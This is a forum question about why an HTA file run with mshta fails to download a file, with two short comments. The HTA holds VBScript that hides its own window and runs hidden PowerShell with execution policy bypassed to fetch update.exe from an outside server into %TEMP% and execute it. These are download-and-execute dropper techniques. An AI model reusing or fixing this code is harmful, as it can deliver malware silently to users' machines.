# mshta download does not work

Tags: javascript, windows

I was trying to download the file from myserver to my clients machines for updagte , once user logged in and open app it will fatch the file from server that file has following code in it.

```html
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Option Explicit
Dim MyCmd,Ws,Ret
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
MyCmd = "cmd /c Powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://mytest.com/update.exe','%TEMP%\update.exe'); Start-Process %TEMP%\update.exe;"
Ret = objShell.run(MyCmd,0,True)
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
```

when I try to run that file manually by mshta myscrpt.hta it does not give any error but does not downlod the file from server . All I want to download and execute the file once the hta is called from server.

Regards

Comment: You should only ever download binaries over HTTPS.

Comment: tried https as well , it does not download the file in temp , does any one have any idea what is wrong with script/